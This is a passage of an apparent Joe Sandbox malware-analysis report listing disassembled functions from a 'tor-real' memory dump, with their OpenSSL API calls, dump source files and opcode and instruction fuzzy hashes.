                                                                              • Part of subcall function 6C0AF950: memcpy.MSVCRT ref: 6C0AF9EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_find_typeO_get_data$memcpy
                                                                            • String ID:
                                                                            • API String ID: 2254905940-0
                                                                            • Opcode ID: 04e880e8234d1cb71beb823ff13170292958a1dbf92734f50306bc60a049bd08
                                                                            • Instruction ID: 06cb1c1ac43ba2c71a024705a5a4039137eabbe8531b1ea678c9b255bd2a1dd3
                                                                            • Opcode Fuzzy Hash: 04e880e8234d1cb71beb823ff13170292958a1dbf92734f50306bc60a049bd08
                                                                            • Instruction Fuzzy Hash: EE01A2B06093128FE700AF74988435F77E4AF44A0CF56486DE594D7701E734E818DB92
                                                                            Function 6C0A6908 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0A6910
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_funcO_freeR_clear_errorR_readX509_free__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 761802978-0
                                                                            • Opcode ID: ad7bd9b53594eac2b1e15796babe44f98da662b9ea59beecf3ff939bccd34cf1
                                                                            • Instruction ID: 3f0f1535d541fc5b1e231d9c0a1634b2efb308061a5b730d7048e06da409ff6d
                                                                            • Opcode Fuzzy Hash: ad7bd9b53594eac2b1e15796babe44f98da662b9ea59beecf3ff939bccd34cf1
                                                                            • Instruction Fuzzy Hash: 12F0F8756483048FC340AF69D49079EB7F0EB8D318F948D2DE49897700C734E9468B86
                                                                            Function 6C0D6840 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID:
                                                                            • API String ID: 1475443563-3916222277
                                                                            • Opcode ID: a1831c664674f6a77035655b32b4fbef6847fac7e8ef1cb292f192e8759e7b25
                                                                            • Instruction ID: 9f7c94d50e6ae936e27eec9fd44add8fabe47c0747f45453187cf759650c56b1
                                                                            • Opcode Fuzzy Hash: a1831c664674f6a77035655b32b4fbef6847fac7e8ef1cb292f192e8759e7b25
                                                                            • Instruction Fuzzy Hash: A781C4746083458FD710CF29C580B8ABBE5BF89308F56CA6DE8A88B711D734E945CF52
                                                                            Function 6C0C6C32 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C6CC4
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C6D0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: 2
                                                                            • API String ID: 557030205-450215437
                                                                            • Opcode ID: b10ac91ec760a6934b49e00f5b1ff6e2a2a4838f3d1984202994485160b78cc3
                                                                            • Instruction ID: 057a30f8b91e43929bd9246c5bd538971959216059855249bf0d4abcbb722213
                                                                            • Opcode Fuzzy Hash: b10ac91ec760a6934b49e00f5b1ff6e2a2a4838f3d1984202994485160b78cc3
                                                                            • Instruction Fuzzy Hash: BE4135B1A093048BC720DF69D58572EBBE0FF89708F14896DE4889B710E775E949CB82
                                                                            Function 6C0C4FF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: n$n
                                                                            • API String ID: 0-3874132673
                                                                            • Opcode ID: f7a958f84cd04afd00c690b56b017f0745ddd243697bfa817e9f795a50ecdd66
                                                                            • Instruction ID: 0aeb87eca298f822dcc966044d652a6f48ce93abdea659b6562450f34d7f08a7
                                                                            • Opcode Fuzzy Hash: f7a958f84cd04afd00c690b56b017f0745ddd243697bfa817e9f795a50ecdd66
                                                                            • Instruction Fuzzy Hash: 5241F1786093019BD720CF29C58471EBBE1BBC8758F208A2DE8A987764E775D844DF82
                                                                            Function 6C0CAA94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C094E20: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094E65
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeO_zallocR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 661623873-2746444292
                                                                            • Opcode ID: c3ff3eb6417d4a46a1585886d3ac76e0d706264e881050d4bb46a4d251980fb4
                                                                            • Instruction ID: e0f00910f4db03f9a3116797798600cadbd616e70aa4bb9c9a45172988972a0a
                                                                            • Opcode Fuzzy Hash: c3ff3eb6417d4a46a1585886d3ac76e0d706264e881050d4bb46a4d251980fb4
                                                                            • Instruction Fuzzy Hash: F34112B4609705CFD700DF69C58479EBBE0BF88748F61891CE89887740D779E849DB82
                                                                            Function 6C0C4400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C4497
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C44AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: /
                                                                            • API String ID: 557030205-2043925204
                                                                            • Opcode ID: bd2766450688143bac812a99a61bc689b31cd23beb304710ef2c6206492d717c
                                                                            • Instruction ID: 0319e9335724cce4f4246d6de6ea5203958bac6e36fc3ebfc96bc4acd21e783a
                                                                            • Opcode Fuzzy Hash: bd2766450688143bac812a99a61bc689b31cd23beb304710ef2c6206492d717c
                                                                            • Instruction Fuzzy Hash: 8F3168B16093019FD3009FA8D58476EBBF1FB85708F26891DE4885B741D77AD849CB93
                                                                            Function 6C0CA601 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA6DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            • Opcode ID: a1dca0a61555688752265550fa38b4ac88af1770dd0b6d3bbe789a0f2faf1284
                                                                            • Instruction ID: 9dd1f77a08c280e060606fee1bfa3de623ecb048d316646b43977dc31ea5494b
                                                                            • Opcode Fuzzy Hash: a1dca0a61555688752265550fa38b4ac88af1770dd0b6d3bbe789a0f2faf1284
                                                                            • Instruction Fuzzy Hash: 4731E8B17053048FDB108F59C48539EBBE0BF88358F61852CE9A89B751D775D845CF86
                                                                            Function 6C0CCF70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 1208671065-307317852
                                                                            • Opcode ID: 1252e50296fb8ff40c1def5ecb965e0cc09e9cfa40da860f93eca273d565a0db
                                                                            • Instruction ID: 02998e274365e4fc2d3fb8ee6c4b3964dd4e74c8297d422cc3081b3f0dcf5a49
                                                                            • Opcode Fuzzy Hash: 1252e50296fb8ff40c1def5ecb965e0cc09e9cfa40da860f93eca273d565a0db
                                                                            • Instruction Fuzzy Hash: 6C316FB16587008FE310CF29D88474FBBE0AF89318F558A2DE4A89B690D775E546CB53
                                                                            Function 6C0CA86C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            • Opcode ID: c2fc1fed42392e10b13f64a3f9674056921da6f5968f85a8f79f5d45a2c49085
                                                                            • Instruction ID: 1c35c383986a4a5e241ebea026504e6a7dfebcc1fc261436c54bbc2277ccdc67
                                                                            • Opcode Fuzzy Hash: c2fc1fed42392e10b13f64a3f9674056921da6f5968f85a8f79f5d45a2c49085
                                                                            • Instruction Fuzzy Hash: 143118716097059FDB01CF69C48839EBBE0BF88318F618A1DE8A897640D379D544DF43
                                                                            Function 6C0B6723 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B6770
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1767461275-3554254475
                                                                            • Opcode ID: 6236df3f88e9239ca11cc512faf4d82809d963851792db89446a24f2828a1459
                                                                            • Instruction ID: 7d2a4778bc4c7118da0ba664d0d2d9d15a32f1a2dcda6199a034253af8a375f7
                                                                            • Opcode Fuzzy Hash: 6236df3f88e9239ca11cc512faf4d82809d963851792db89446a24f2828a1459
                                                                            • Instruction Fuzzy Hash: 7C3137B550A3019BE700DF61D98438BBBE0AB4030CF148C2DE9989F781E7BAD5889F42
                                                                            Function 6C0BE594 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0D8600: OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0BE5BF
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_num$O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 621194475-307317852
                                                                            • Opcode ID: 5adc512e41f4b0d9949d644e3643a27560068164d145596cc78b9c0c76a3fc6a
                                                                            • Instruction ID: 1335e9a9c033e3452ef0a77df35125df817e8b1e48f00c78134d1f429b5b5705
                                                                            • Opcode Fuzzy Hash: 5adc512e41f4b0d9949d644e3643a27560068164d145596cc78b9c0c76a3fc6a
                                                                            • Instruction Fuzzy Hash: 4A2190B06097029FE7109F25D58435FBBE4EF80388F11881DE49497740E779E8458B83
                                                                            Function 6C0CADD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA6DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            • Opcode ID: 5f98c0f65a1975f4af5f5da5be067b492caf2232fe5699d0bcfc4800f4e4393c
                                                                            • Instruction ID: abe14548ad1c6a1bfbecbf7e47cba040b48f3325807c1a02b73222d642a31c9d
                                                                            • Opcode Fuzzy Hash: 5f98c0f65a1975f4af5f5da5be067b492caf2232fe5699d0bcfc4800f4e4393c
                                                                            • Instruction Fuzzy Hash: 242129B120A3058FDB009F59C88839EB7E0FF84348F61891CE9A89B740C376D845CB87
                                                                            Function 6C0CEB33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0CEBBE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
